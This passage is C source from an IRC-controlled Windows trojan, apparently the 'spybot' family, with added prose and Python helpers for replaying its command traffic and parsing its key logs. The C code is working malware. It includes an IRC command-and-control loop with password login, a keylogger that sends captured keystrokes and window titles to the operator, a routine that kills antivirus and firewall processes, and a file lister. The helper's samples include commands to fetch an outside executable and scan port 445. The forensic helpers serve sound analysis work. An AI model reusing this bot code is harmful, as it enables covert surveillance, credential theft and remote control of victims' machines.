 880 		RegCloseKey(key);
 881 		return readkey;
 882 	}
 883 	RegCloseKey(key);
 884 	return NULL;
 885 }
 886 void regwritekey(char *serv,int num)
 887 {
 888 	HKEY key;
 889 	char Rkey[512];	
 890 	sprintf(Rkey,"data%i",num);
 891 	RegCreateKeyEx(HKEY_LOCAL_MACHINE, registrykey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &key, NULL);
 892     	RegSetValueEx(key, Rkey, 0, REG_SZ, serv, 127);
 893 }
 894 
 895 */
 896 
 897 //connect functie
 898 
 899 int irc_connect(char * serveraddr,int poort)
 900 {
 901 	DWORD err;
 902 	memset(IRC_server,0,sizeof(IRC_server));
 903 	strcpy(IRC_server,serveraddr);
 904 	restart:;
 905 	SOCKET Server;
 906 	if ((Server = create_sock(IRC_server,poort)) == SOCKET_ERROR) return 0;
 907 	err = irc_read(Server);
 908 	if (err == 2) goto restart;
 909 	else if (err == 3) { 
 910 		Sleep(distime);
 911 		goto restart;
 912 	}
 913 	return err;
 914 
 915 }
 916 
 917 void getnick()
 918 {
 919 	char username[250];
 920 	memset(username,0,sizeof(username));
 921 	memset(nick,0,sizeof(nick));
 922 	if (GetUserName(username, &nSize))
 923 		strcpy(realname,username);
 924 	strtok(username," ");
 925 	if (strlen(username) < 3 || strlen(username) > 20 || strcmp(username,"Administrator") == 0 || strcmp(username,"Default") == 0)  //we create a random nick
 926 		randnick();
 927 	else {
 928 		srand(GetTickCount());
 929 		sprintf(nick,"%s%i",username,(rand()%99));//add a random number at the end of the username
 930 	}
 931 }
 932 void randnick()
 933 {
 934 	memset(nick,0,sizeof(nick));
 935 	int c, len;
 936 	srand(GetTickCount());
 937 	len = (rand()%3)+4;
 938 	for (c=0; c<len; c++) nick[c] = (rand()%26)+97;
 939 	nick[c+1] = '\0';
 940 	strcpy(realname,nick);
 941 }
 942 int irc_read(SOCKET Server)
 943 {
 944 	char *line;
 945 	char buf[5096];
 946 	char buffer[4096];
 947 	int er = 1;
 948 	int i;
 949 	memset(logins,0,sizeof(logins));
 950 	SOCKADDR sa;
 951 	int sas;
 952 	memset(IP,0,sizeof(IP));
 953 	sas = sizeof(sa);
 954 	memset(&sa, 0, sizeof(sa));
 955 	getsockname(Server, &sa, &sas);
 956 	sprintf(IP,"%d.%d.%d.%d",(BYTE)sa.sa_data[2], (BYTE)sa.sa_data[3], (BYTE)sa.sa_data[4], (BYTE)sa.sa_data[5]);
 957 	getnick();
 958 	sprintf(buffer,"NICK %s\r\n USER %s \"hotmail.com\" \"%s\" :%s\r\n",nick,nick,IP,realname);
 959       	send(Server, buffer, strlen(buffer), 0);
 960 	TIMEVAL time;
 961    	fd_set fd_struct;
 962     	time.tv_sec = 60;//timeout after 60 sec.
 963     	time.tv_usec = 0;
 964    	FD_ZERO(&fd_struct);
 965     	FD_SET(Server, &fd_struct);
 966 	if (select(0, &fd_struct, NULL, NULL, &time) <= 0)
 967 	{
 968 		closesocket(Server); //the server didnt responce within 60 sec. so we try a other server
 969 		return 0;
 970 	}
 971 
 972 	while (1) {
 973 		memset(buffer,0,sizeof(buffer));
 974 		memset(buf,0,sizeof(buf));
 975 		int len;
 976 		if ((len = recv(Server, buffer,sizeof(buffer), 0)) <= 0) 
 977 			break;
 978 		int t,r;
 979 		if (dccspy > 0) send(dccspy,buffer, strlen(buffer), 0);
 980 		for (t=0;t<len;t++)
 981 		{
 982 			if (buffer[t] == '\r') {
 983 				r=0;
 984 				er = irc_readline(buf,Server);
 985 				if (er > 0) {
 986 					closesocket(Server);
 987 					return er;
 988 				}
 989 				memset(buf,0,sizeof(buf));
 990 			}
 991 			else if (buffer[t] == '\0' || buffer[t] == '\n' || buffer[t] == '\r') continue;
 992 			else {
 993 				buf[r] = buffer[t];
 994 				r++;
 995 			}
 996 
 997 		}
 998 	}
 999 	closesocket(Server);
1000 	return 0;
1001 }
1002 
1003 int irc_readline(char * line,SOCKET Server)
1004 {
1005 	char buf[512];
1006 	char line1[512];
1007 	char *s[5];
1008 	char *x;
1009 	char *y;
1010 	char user[50];
1011 	int i,c,w;
1012 	int q = 3;
1013 	int err = 0;
1014 	BOOL master = FALSE;
1015 	memset(buf,0,sizeof(buf));
1016 
1017 	strncpy(line1, line, sizeof(line1)-1);
1018 	s[0] = strtok(line1, " ");
1019 	for (i = 1; i < 5; i++) s[i] = strtok(NULL, " ");
1020 	if (s[0] == NULL || s[1] == NULL) return 0;
1021 	if (strcmp("PING", s[0]) == 0) {
1022 		sprintf(buf,"PONG %s\r\n",s[1]+1);
1023 		send(Server, buf, strlen(buf), 0);
1024 	}
1025 	else if (strcmp("376", s[1]) == 0 || strcmp("422", s[1]) == 0) {
1026 		if (channelpass) sprintf(buf,"JOIN %s %s\r\n",channel,channelpass);
1027 		else sprintf(buf,"JOIN %s\r\n",channel);
1028 		send(Server, buf, strlen(buf), 0);
1029 
1030 		#ifdef  rawcommands_after_connect
1031 		raw_commands(Server);
1032 		#endif
1033 	}
1034 	else if (strcmp("433",s[1]) == 0 || strcmp("432",s[1]) == 0) {
1035 		randnick();
1036 		sprintf(buf,"NICK %s\r\n",nick);
1037 		send(Server, buf, strlen(buf), 0);
1038 	}
1039 	if (s[2] == NULL) return 0;
1040 
1041 	#ifdef rawcommands_after_join
1042 	if (strcmp("366",s[1]) == 0) 
1043 		raw_commandsonjoin(Server,s[3]);
1044 	#endif
1045 
1046 	strncpy(user, s[0]+1, sizeof(user)-1);
1047 
1048 	strtok(user, "!");
1049 	if (strcmp("NICK",s[1]) == 0) {
1050 		for (i = 0; i < maxlogins; i++) {
1051 			if (strcmp(logins[i],user) == 0 && logins[i] != NULL) strcpy(logins[i],s[2]);
1052 		}
1053 	}
1054 	if (strcmp("QUIT", s[1]) == 0 || strcmp("PART", s[1]) == 0) {
1055 		for (i = 0; i < maxlogins; i++) {
1056 			if (strcmp(logins[i],user) == 0 && logins[i] != NULL) memset(logins[i],0,sizeof(logins[i]));
1057 		}
1058 
1059 	}
1060 	if (s[3] == NULL) return 0;
1061 	if (strcmp(channel,s[3]) == 0) {
1062 		if (strcmp("471",s[1]) == 0 || strcmp("472",s[1]) == 0 || strcmp("473",s[1]) == 0 || strcmp("474",s[1]) == 0 || strcmp("475",s[1]) == 0) return 4; //we cant join channel ? its full,invite only,whe dont have the correct key or we are banned  maybe some fucking ircop we try a other server
1063 	}
1064 	if (strcmp("KICK", s[1]) == 0) { //hope we are not kicked...
1065 		for (i = 0; i < maxlogins; i++) {
1066 			if (strcmp(logins[i],s[3]) == 0 && logins[i] != NULL) memset(logins[i],0,sizeof(logins[i])); //or master is kicked
1067 		}
1068 		if (strcmp(nick,s[3]) == 0) {
1069 			sprintf(buf,"JOIN %s %s\r\n",channel,channelpass);
1070 			send(Server, buf, strlen(buf), 0);
1071 		}
1072 	}
1073 	if ((strcmp("PRIVMSG",s[1]) == 0 || (strcmp("332",s[1]) == 0 && topiccommands))) { //its a privmsg or topic
1074 		if (strcmp("PRIVMSG",s[1]) == 0) {
1075 			if (strstr(s[2], "#") == NULL) s[2] = user;
1076 			for (i = 0; i < maxlogins; i++) {
1077 				if (strcmp(logins[i],user) == 0 && logins[i] != NULL) master = TRUE;
1078 			}
1079 			if (strcmp(login_command,s[3]+1) == 0 && s[4] != NULL)
1080 			{
1081  				if (master) return 0;
1082 				int x;
1083 				for (x = 0; x < maxlogins; x++) {
1084 					if (logins[x][0] != '\0') continue;
1085 					if (strcmp(password,s[4]) == 0) {
1086 						char * hostname2;
1087 						char * hostname;
1088 						char hostS[512];
1089 						strcpy(hostS,s[0]);
1090 						#ifdef use_nickname_match
1091 						for (i=0;trustednicks[i] != NULL;i++)
1092 						{
1093 							if (strcmp(user,trustednicks[i]) == 0) goto nick;
1094 						}
1095 						return 0;
1096 						nick:;
1097 						#endif
1098 						#ifdef use_ident_match
1099 						char * h_ident;
1100 						hostname2 = strstr(s[0], ":");
1101 						h_ident = strtok(hostname2, "@")+strlen(user)+2;
1102       	       
1103 						for (i=0;trustedidents[i] != NULL;i++)
1104 						{
1105 							if (strcmp(h_ident,trustedidents[i]) == 0) goto ident;
1106 						}
1107 						return 0;
1108 						ident:;
1109 						#endif
1110 						
1111 						#ifdef use_hostname_match
1112 						BOOL goodhost = FALSE;
1113 						hostname = strstr(hostS, "@");
1114 						for (i = -1;trustedhosts[i+1] != NULL; i++) 
1115 						{
1116 
1117 							restart:;
1118 							i++;
1119 							if (trustedhosts[i] == NULL) return 0;
1120 							for (c = 0; c < strlen(trustedhosts[i])-1; c++) {
1121 								if (trustedhosts[i][0] == '*') {
1122 									if (hostname[strlen(hostname) - 1 - c] != trustedhosts[i][strlen(trustedhosts[i]) - 1 -c]) {
1123 										if (trustedhosts[i][strlen(trustedhosts[i]) - 1 -c] != '*') goto restart;
1124 									}
1125 
1126 								}
1127 								else if (hostname[c+1] != trustedhosts[i][c]) {
1128 									if (trustedhosts[i][c] == '*') continue;
1129 									else goto restart;
1130 								}
1131 							}
1132 							goodhost = TRUE;
1133 							break;
1134 						}
1135 						
1136 						if (goodhost || trustedhosts[0] == NULL) {
1137 						#endif
1138 							strcpy(logins[x],  user);
1139 							master = TRUE;
1140 							return 0;
1141 						#ifdef use_hostname_match
1142 						}
1143 						#endif
1144 					}
1145 				}
1146 			}
1147 		}
1148 		else {
1149 			s[2] = s[3];
1150 			q = 4;
1151 		}
1152 		if (!master && strcmp("332",s[1]) != 0) return 0;
1153 		
1154 		if (strcmp(":\1DCC",s[3]) == 0 && s[4] != NULL) {
1155 			x = strstr(line, " :");
1156 			y = strstr(x+1, " ");
1157 			err = read_command(Server,Server,s[4],y+1,s[2]);
1158 		}
1159 		else 	{
1160 			SOCKET sendsock = Server;
1161 			x = strstr(line, " :")+2;
1162 			#ifdef Use_Encrypted_commands
1163 			decrypt(x,commands_decryptkey);
1164       	 		#endif
1165 			if (x[strlen(x)-1] == 's' && x[strlen(x)-2] == '-' && x[strlen(x)-3] == ' ') { x[strlen(x)-1] = '\0'; x[strlen(x)-1] = '\0'; x[strlen(x)-1] = '\0'; sendsock = 0; }
1166 			char command1[512];
1167 			memset(command1,0,sizeof(command1));
1168 			strcpy(command1,x);
1169 			strtok(command1," ");
1170 			if (strcmp(command1,nick) == 0 || strcmp(command1,Bot_Version) == 0)  { 
1171 				char *command2;
1172 				char commandline[512];
1173 				memset(commandline,0,sizeof(commandline));
1174 				strcpy(commandline,x);
1175 				command2 = strstr(x," ");
1176 				strtok(command2," ");
1177 				err = read_command(sendsock,Server,command2+1,commandline+1+strlen(command1+1),s[2]);
1178 			 }
1179 			else 
1180 				err = read_command(sendsock,Server,command1,x,s[2]);
1181 		}
1182 
1183 	}
1184 	return err;
1185 }
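irc_read() and irc_readline() above define both the bot's registration traffic (a NICK line followed by a USER line with the hard-coded "hotmail.com" hostname field and the bot's own IP as the server field) and its command dispatch: a PRIVMSG is obeyed only after the sender has sent the login command with the right password, a channel topic (numeric 332) is obeyed with no login at all, a message may be addressed as "<nick> <command>" or "<Bot_Version> <command>", a trailing " -s" suppresses the reply, and CTCP DCC requests are routed with the DCC sub-command as the command. The Python below is an added example for replaying captured server-to-bot IRC lines through those rules; it is not part of the bot's source. BOT_NICK, BOT_VERSION, LOGIN_COMMAND, PASSWORD and TOPIC_COMMANDS are placeholder values, since the real ones live in a config header that is not on this page, and the sample lines are constructed.

```python
import re

# Placeholders for the bot's compile-time config (not present in this listing).
BOT_NICK = "jsmith42"        # assumption: nick the bot registered with
BOT_VERSION = "spybot"       # assumption
LOGIN_COMMAND = "login"      # assumption
PASSWORD = "s3cret"          # assumption
TOPIC_COMMANDS = True        # the bot's `topiccommands` flag; assumed enabled

# Registration line the bot sends right after NICK; note the leading space it
# inherits from the "\r\n USER ..." format string and the fixed "hotmail.com".
USER_RE = re.compile(r'^ ?USER (\S+) "hotmail\.com" "(\d{1,3}(?:\.\d{1,3}){3})" :(.*)$')


def spybot_registration(line):
    """Return (nick, ip, realname) if `line` is the bot's USER registration, else None."""
    m = USER_RE.match(line.rstrip("\r\n"))
    return m.groups() if m else None


def split_fields(line):
    """irc_readline() tokenises on ' ' into s[0..4]; strtok collapses repeated spaces."""
    parts = [p for p in line.split(" ") if p][:5]
    return parts + [None] * (5 - len(parts))


def extract_commands(lines, masters=None):
    """Replay server->bot lines through the bot's dispatch rules and return the
    commands it would have handed to read_command(). `masters` collects nicks
    that completed the login handshake; the bot trusts them for the session."""
    masters = set() if masters is None else masters
    found = []
    for raw in lines:
        line = raw.rstrip("\r\n")
        s = split_fields(line)
        if None in s[:4]:
            continue
        sender = s[0][1:].split("!")[0]
        if s[1] == "PRIVMSG":
            reply_to = s[2] if "#" in s[2] else sender      # queries are answered in a query
            if s[3][1:] == LOGIN_COMMAND and s[4] is not None:
                if sender not in masters and s[4] == PASSWORD:
                    masters.add(sender)
                continue
            if sender not in masters:
                continue                                     # non-masters are ignored silently
            via = "privmsg"
        elif s[1] == "332" and TOPIC_COMMANDS:
            reply_to, via = s[3], "topic"                    # topic commands need no login
        else:
            continue
        _, sep, text = line.partition(" :")
        if not sep:
            continue
        if via == "privmsg" and s[3] == ":\x01DCC" and s[4] is not None:
            # CTCP "DCC SEND <file> <ip> <port> ..." or "DCC CHAT chat <ip> <port>"
            words = text.split(" ", 2)
            found.append({"sender": sender, "reply_to": reply_to, "via": "dcc",
                          "command": words[1], "args": words[2] if len(words) > 2 else "",
                          "silent": False})
            continue
        silent = text.endswith(" -s")                        # " -s": execute but do not reply
        if silent:
            text = text[:-3]
        words = text.split(" ")
        if words[0] in (BOT_NICK, BOT_VERSION):              # "<nick> cmd ..." addressing form
            words = words[1:]
        if not words or not words[0]:
            continue
        found.append({"sender": sender, "reply_to": reply_to, "via": via,
                      "command": words[0], "args": " ".join(words[1:]), "silent": silent})
    return found


# Constructed capture: one operator logs in and issues commands, a bystander is ignored.
SAMPLE_LINES = [
    ":evil!op@c2.example.net PRIVMSG #chan :login s3cret",
    ":evil!op@c2.example.net PRIVMSG #chan :jsmith42 download http://198.51.100.7/u.exe c:\\u.exe",
    ":evil!op@c2.example.net PRIVMSG jsmith42 :list c:\\ -s",
    ":nobody!x@y PRIVMSG #chan :delete c:\\boot.ini",
    ":evil!op@c2.example.net PRIVMSG jsmith42 :\x01DCC SEND tool.exe 3324485955 1024 4096\x01",
    ":c2.example.net 332 jsmith42 #chan :scan 0 445 5",
]

if __name__ == "__main__":
    for cmd in extract_commands(SAMPLE_LINES):
        print(cmd)
```

Run over IRC lines reassembled from a capture, the output is the operator's command history for the bot; the topic path is worth flagging on its own, because anyone who can set the channel topic controls the bot without ever knowing the password.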
1186 DWORD WINAPI keylogger(LPVOID Param)
1187 {
1188 	HWND win, winold;
1189 	int bKstate[256]={0};
1190         int i,x;
1191 	int err = 0;
1192 	int threadnum = (int)Param;
1193 	char buffer[600];
1194 	char buffer2[800];
1195 	char window[61];
1196 	int state;
1197 	int shift;
1198 	char logfile[MAX_PATH];
1199 
1200 	#ifdef start_keylogger_afterstartup
1201 	char sysdir[MAX_PATH];
1202 	GetSystemDirectory(sysdir, sizeof(sysdir));
1203 	sprintf(logfile,"%s\\%s",sysdir,keylogfilename);
1204 	FILE *log;
1205 	log = fopen(logfile,"aw");
1206 	if (log != NULL) {
1207 		char date[70];
1208 		GetDateFormat(0x409,0,0,"\n[dd:MMM:yyyy, ",date,70);
1209 		fputs(date,log);
1210 		memset(date,0,sizeof(date));
1211 		GetTimeFormat(0x409,0,0," HH:mm:ss]",date,70);
1212 		fputs(date,log);
1213 		fputs(" Keylogger Started\n\n",log);
1214 		fclose(log);
1215 	}
1216 	#endif
1217 
1218 	memset(buffer,0,sizeof(buffer));
1219 	win = GetForegroundWindow();
1220 	winold = win;
1221 	GetWindowText(winold,window,60);
1222 	while (err == 0) {
1223 		Sleep(8);
1224 		win = GetForegroundWindow();
1225 		if (win != winold) {
1226 			if (strlen(buffer) != 0) {
1227 				sprintf(buffer2,"%s (Changed window",buffer);
1228 				err = sendkeys(keysock,buffer2,window,logfile);
1229 				memset(buffer,0,sizeof(buffer));
1230 				memset(buffer2,0,sizeof(buffer2));
1231 			}
1232 			win = GetForegroundWindow();
1233 			winold = win;
1234 			GetWindowText(winold,window,60);
1235 
1236 		}
1237 		for(i=0;i<92;i++)
1238 		{
1239 			shift = GetKeyState(VK_SHIFT);
1240  			x = inputL[i];
1241 			if (GetAsyncKeyState(x) & 0x8000) {
1242 				//see if capslock or shift is pressed doesnt work most of the time on win9x
1243 				if (((GetKeyState(VK_CAPITAL) != 0) && (shift > -1) && (x > 64) && (x < 91)))//caps lock and NOT shift
1244 					bKstate[x] = 1;//upercase a-z
1245 				else if (((GetKeyState(VK_CAPITAL) != 0) && (shift < 0) && (x > 64) && (x < 91)))//caps lock AND shift
1246 					bKstate[x] = 2;//lowercase a-z
1247 				else if (shift < 0) //Shift
1248 					bKstate[x] = 3; //upercase
1249 				else bKstate[x] = 4; //lowercase 
1250 			}
1251 
1252 			else {
1253 				if (bKstate[x] != 0)
1254 				{
1255 					state = bKstate[x];
1256 					bKstate[x] = 0;
1257 					if (x == 8) {
1258 						buffer[strlen(buffer)-1] = 0;
1259 						continue;
1260 					}
1261 					else if (strlen(buffer) > 550) {
1262 						win = GetForegroundWindow();
1263 						GetWindowText(win,window,60);
1264 						sprintf(buffer2,"%s (Buffer full",buffer);
1265 						err = sendkeys(keysock,buffer2,window,logfile);
1266 						memset(buffer,0,sizeof(buffer));
1267 						memset(buffer2,0,sizeof(buffer2));
1268 						continue;
1269 					}
1270 					else if (x == 13)  {
1271 						if (strlen(buffer) == 0) continue;
1272 						win = GetForegroundWindow();
1273 						GetWindowText(win,window,60);
1274 						sprintf(buffer2,"%s (Return",buffer);
1275 						err = sendkeys(keysock,buffer2,window,logfile);
1276 						memset(buffer,0,sizeof(buffer));
1277 						memset(buffer2,0,sizeof(buffer2));
1278 						continue;
1279 					}
1280 					else if (state == 1 || state == 3)
1281 						strcat(buffer,outputH[i]);
1282 					else if (state == 2 || state == 4)
1283 						strcat(buffer,outputL[i]);
1284 				}
1285 
1286      			}
1287 		}
1288 	}
1289 	threads[threadnum].id = 0;
1290 	return 1;
1291 }
1292 
1293 int sendkeys(SOCKET sock,char *buf,char *window,char *logfile)
1294 {
1295 	char buffer[4092];
1296 	strcat(buf,")\n");
1297 	#ifdef start_keylogger_afterstartup
1298 	int len = 0;
1299 	FILE *log;
1300 	log = fopen(logfile,"aw");
1301 	if (log != NULL) {
1302 		char date[20];
1303 		GetTimeFormat(0x409,0,0,"[HH:mm:ss] ",date,19);
1304 		fputs(date,log);
1305 		len = strlen(date) + strlen(window);
1306 		fputs(window,log);
1307 		len = 75 - len;
1308 		if (len > 0) {
1309 			int c;
1310 			for(c=0;c<len;c++)
1311 				fputc(32,log);
1312 
1313 		}
1314 	 	fputs(buf,log);
1315 		fclose(log);
1316 	}
1317 	if (sendkeysto == 0) return 0;
1318 	#endif
1319 
1320 	strcat(buf,"\r");
1321 	if (strlen(keylogchan) == 0) {
 1322 		sprintf(buffer,"(%s) \x03" "10 %s",window,buf); /* 0x03 = IRC colour control code */
1323 	}
1324 	else {
 1325 		sprintf(buffer,"PRIVMSG %s :(%s)\x03" "10  %s",keylogchan,window,buf); /* 0x03 = IRC colour control code */
1326 	}
1327 	if (send(sock,buffer,strlen(buffer),0) == SOCKET_ERROR) {
1328 		memset(keylogchan,0,sizeof(keylogchan));
1329 		sendkeysto = 0;
1330 		#ifndef start_keylogger_afterstartup
1331 		return 1;
1332 		#endif
1333 	}
1334 	return 0;
1335 }
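keylogger() and sendkeys() above fix the on-disk format of the key log: one "[dd:MMM:yyyy,  HH:mm:ss] Keylogger Started" header per bot start, then one line per flush made of "[HH:mm:ss] ", the foreground window title (at most 59 characters, the GetWindowText cap) padded with spaces to column 75, the captured keys, and a " (Return)", " (Changed window)" or " (Buffer full)" marker that says why the buffer was flushed. The same text also goes out over IRC as "PRIVMSG <chan> :(<window>)\x0310  <keys> (<marker>)". The Python below is an added forensic helper for that format, not code from the bot or from this write-up; the sample log and window titles are constructed.

```python
import re

# Layout produced by keylogger()/sendkeys(): timestamp (11 chars), window title padded
# to column 75, then the keys and the flush marker.
START_RE = re.compile(r"^\[(\d{2}:[A-Za-z]{3}:\d{4}),\s+(\d{2}:\d{2}:\d{2})\] Keylogger Started$")
ENTRY_RE = re.compile(r"^\[(\d{2}:\d{2}:\d{2})\] (.{64})(.*) \((Return|Changed window|Buffer full)\)$")
IRC_RE = re.compile(r"^PRIVMSG (\S+) :\((.*?)\)\x0310  (.*) \((Return|Changed window|Buffer full)\)$")


def parse_keylog(text):
    """Parse keylog.txt. Returns (starts, entries): the bot start timestamps and one
    dict per flushed line with time, window title, keys and the flush reason."""
    starts, entries = [], []
    for line in text.splitlines():
        m = START_RE.match(line)
        if m:
            starts.append(m.group(1) + " " + m.group(2))
            continue
        m = ENTRY_RE.match(line)
        if m:
            entries.append({"time": m.group(1), "window": m.group(2).rstrip(),
                            "keys": m.group(3), "flush": m.group(4)})
    return starts, entries


def parse_irc_keylog(line):
    """Parse the IRC form of one flush (the PRIVMSG the bot sends to keylogchan)."""
    m = IRC_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    return {"channel": m.group(1), "window": m.group(2), "keys": m.group(3), "flush": m.group(4)}


def typed_by_window(entries):
    """Group keystrokes per foreground window. A 'Buffer full' flush is stitched to
    the next flush for the same window, since the logger cut it mid-line at 550 chars."""
    out, pending = {}, {}
    for e in entries:
        text = pending.pop(e["window"], "") + e["keys"]
        if e["flush"] == "Buffer full":
            pending[e["window"]] = text
        else:
            out.setdefault(e["window"], []).append(text)
    for window, text in pending.items():
        out.setdefault(window, []).append(text)
    return out


# Constructed sample in the logger's exact layout (title padded to 64 chars after the timestamp).
SAMPLE_LOG = "".join([
    "\n[25:Feb:2014,  14:03:22] Keylogger Started\n\n",
    "[14:03:25] " + "Inbox - Outlook Express".ljust(64) + "hi bob, see attached (Return)\n",
    "[14:04:01] " + "Log On to Windows".ljust(64) + "jsmith (Changed window)\n",
    "[14:04:09] " + "Log On to Windows".ljust(64) + "Pa55w0rd (Return)\n",
])

if __name__ == "__main__":
    starts, entries = parse_keylog(SAMPLE_LOG)
    print(starts)
    for window, lines in typed_by_window(entries).items():
        print(window, lines)
```

Because the title column is fixed-width and the logger truncates titles at 59 characters, the keys always start at column 75; the regex relies on that rather than on a separator, which a title containing spaces would defeat.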
1336 
1337 #ifdef use_funstuf 
1338 void Keyevent (BYTE key,BOOL caps)
1339 {
1340 	if (caps) keybd_event(VK_SHIFT,MapVirtualKey(VK_SHIFT,0),FALSE?KEYEVENTF_KEYUP:0,0);
1341         keybd_event(key,MapVirtualKey(key,0),FALSE?KEYEVENTF_KEYUP:0,0);
1342 	keybd_event(key,MapVirtualKey(key,0),TRUE?KEYEVENTF_KEYUP:0,0);
1343 	if (caps) keybd_event(VK_SHIFT,MapVirtualKey(VK_SHIFT,0),TRUE?KEYEVENTF_KEYUP:0,0);
1344 }
1345 #endif
1346 
1347 #ifdef Use_Firewall_killer
1348 DWORD WINAPI kill_av(LPVOID param)
1349 {
1350 	while (1)
1351 	{
1352 		listProcesses(0,NULL,NULL,TRUE);
1353 		Sleep(killer_delay);
1354 	}
1355 	return 0;
1356 }
1357 #endif
1358 int listProcesses(SOCKET sock,char *chan,char *proccess,BOOL killthread)
1359 {
1360 	HANDLE hand;
1361 	HANDLE killer;
1362 	char buffer[500];
1363  	PROCESSENTRY32 pe32 = {0};
1364 	int c;
1365 	char window[250];
1366 	if (fCreateToolhelp32Snapshot && fProcess32First && fProcess32Next) {
1367 		hand = fCreateToolhelp32Snapshot(2, 0);
1368 		if (hand != INVALID_HANDLE_VALUE) {
1369 			pe32.dwSize = sizeof(PROCESSENTRY32);
1370 			if (fProcess32First(hand, &pe32)) {
1371 				do {
1372 					if (killthread) {
1373 						#ifdef Use_Firewall_killer
1374 						CharUpperBuff(pe32.szExeFile,strlen(pe32.szExeFile));
1375 						for(c = 0;kill_list[c] != NULL;c++)
1376 						{
1377 							if (strstr(pe32.szExeFile,kill_list[c]) != NULL) {
1378  								killer=OpenProcess(PROCESS_ALL_ACCESS,FALSE,pe32.th32ProcessID);
1379 								TerminateProcess(killer,0);
1380 								break;
1381 							}
1382 						}
1383 						#endif
1384 					}
1385 					else if (proccess == NULL) {
1386 						memset(buffer,0,sizeof(buffer));
1387 						if (chan != NULL) {
1388 							Sleep(Flood_delay);
1389 							sprintf(buffer,"PRIVMSG %s :%s\r\n",chan,pe32.szExeFile);
1390 						}
1391 						else sprintf(buffer,"%s\n\r",pe32.szExeFile);
1392 						send(sock,buffer,strlen(buffer),0);
1393 					}
1394 					else {
1395 						if (strcmp(pe32.szExeFile,proccess) == 0) {
1396  							killer = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pe32.th32ProcessID);
1397 							CloseHandle(hand);
1398 							if (!TerminateProcess(killer,0)) return 0;
1399 							return 1;
1400 						 }
1401 
1402 					}
1403 
1404 				} while (fProcess32Next(hand, &pe32));
1405 			}
1406 			CloseHandle(hand);
1407 		}
1408 	}
1409 
1410  	return 0;
1411 
1412 }
1413 
1414 
1415 int getfiles(char *current,SOCKET dccsock,char *chan,char *URL)
1416 {
1417 	char sendbuf[MAX_PATH];
1418 	char parent[MAX_PATH];
1419 	memset(parent,0,sizeof(parent));
1420         HANDLE Hnd;
1421         WIN32_FIND_DATA WFD;
1422 	DWORD c;
1423 	int count = 0;
1424 	int count2 = 0;
1425 	strtok(current,"\n");
1426 	if (chan) sprintf(sendbuf,"PRIVMSG %s :Searsing for: %s\r\n",chan,current);
1427 	else if (URL) sprintf(sendbuf,"<HTML><PRE>\n");
1428 	else sprintf(sendbuf,"Searsing for: %s\r\n",current);
1429         send(dccsock,sendbuf,strlen(sendbuf),0);
1430 	if (URL && strlen(URL) > 2) {
1431 		//make the Parent Directory
1432 		for (c=strlen(URL)-3;c != 0;c--)
1433 			if (URL[c] == 47) 
1434 				break;
1435 		strncpy(parent,URL,c+1);
1436 		sprintf(sendbuf,"<li><A href=\"%s\">Parent Directory</A></li>\r\n",parent);
1437 		send(dccsock,sendbuf,strlen(sendbuf),0);
1438 	}
1439         Hnd = FindFirstFile(current, &WFD);
1440         while (FindNextFile(Hnd, &WFD))
1441         {
1442         	if ((WFD.dwFileAttributes) &&  (strcmp(WFD.cFileName, "..") && strcmp(WFD.cFileName, ".")))
1443         	{
1444 
1445 			memset(sendbuf,0,sizeof(sendbuf));
1446 			if (WFD.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
1447 				count2++;
1448 				if (chan) sprintf(sendbuf,"PRIVMSG %s :[%s]\r\n",chan,WFD.cFileName);
1449 				else if (URL) //its a http request
1450 					sprintf(sendbuf,"<li><A href=\"%s%s/\">%s</A></li> <b><u>(Directory)</b></u>\r\n",URL,WFD.cFileName,WFD.cFileName);
1451 				else
1452 					sprintf(sendbuf,"<%s>\r\n",WFD.cFileName);
1453 			}
1454 			else {
1455 				count++;
1456 				if (chan) sprintf(sendbuf,"PRIVMSG %s :%s (%i bytes)\r\n",chan,WFD.cFileName,WFD.nFileSizeLow);
1457 				else if (URL)//its a http request
1458 					sprintf(sendbuf,"<p><A href=\"%s%s\">%s</A> (%i bytes)\r\n",URL,WFD.cFileName,WFD.cFileName,WFD.nFileSizeLow);
1459 				else 
1460 					sprintf(sendbuf,"%s  (%i bytes)\r\n",WFD.cFileName,WFD.nFileSizeLow);
1461 			
1462 			}
1463 			send(dccsock,sendbuf,strlen(sendbuf),0);
1464 			if (chan) Sleep(Flood_delay);
1465      		}
1466 
1467         }
1468     	(void) FindClose(Hnd);
1469 	if (chan) sprintf(sendbuf,"PRIVMSG %s :Found %i files and %i dirs\r\n",chan,count,count2);
1470 	else if (URL) sprintf(sendbuf,"</PRE></HTML>"); 
1471 	else sprintf(sendbuf,"Found: %i files and %i dirs\r\n",count,count2);
1472 	send(dccsock,sendbuf,strlen(sendbuf),0);
1473    	return 0;
1474 }
1475 
1476 
1477 
1478 
1479 #ifdef  rawcommands_after_connect
1480 void raw_commands(SOCKET sock)
1481 {
1482 	char *p;
1483 	char buf[512];
1484 	char buf2[512];
1485 	char buf3[512];
1486 	int c;
1487 	for (c = 0;rawcommands[c] != NULL;c++) {
1488 		if (strstr(rawcommands[c], "$NICK") != NULL) {
1489 			memset(buf,0,sizeof(buf));
1490 			memset(buf2,0,sizeof(buf2));
1491 			memset(buf3,0,sizeof(buf3));
1492 			strcpy(buf,rawcommands[c]);
1493 			strcpy(buf3,buf);
1494 			strtok(buf3,"$NICK");
1495 			p = strstr(buf, "$NICK");
1496 			sprintf(buf2,"%s%s%s\n\r",buf3,nick,p+5);
1497 		}
1498 		else
1499 			sprintf(buf2,"%s\n\r",rawcommands[c]);
1500 		send(sock, buf2, strlen(buf2), 0);
1501 		Sleep(1000);
1502 	}
1503 }
1504 #endif
1505 
1506 #ifdef rawcommands_after_join
1507 void raw_commandsonjoin(SOCKET sock,char *chan)
1508 {
1509 	char *p;
1510 	char buf[512];
1511 	char buf2[512];
1512 	char buf3[512];
1513 	int c;
1514 	for (c = 0;onjoin_commands[c] != NULL;c++) {
1515 		if (strstr(onjoin_commands[c], "$CHAN") != NULL) {
1516 			memset(buf,0,sizeof(buf));
1517 			memset(buf2,0,sizeof(buf2));
1518 			memset(buf3,0,sizeof(buf3));
1519 			strcpy(buf,onjoin_commands[c]);
1520 			strcpy(buf3,buf);
1521 			strtok(buf3,"$CHAN");
1522 			p = strstr(buf, "$CHAN");
1523 			sprintf(buf2,"%s%s%s\n\r",buf3,chan,p+5);
1524 		}
1525 		else
1526 			sprintf(buf2,"%s\n\r",onjoin_commands[c]);
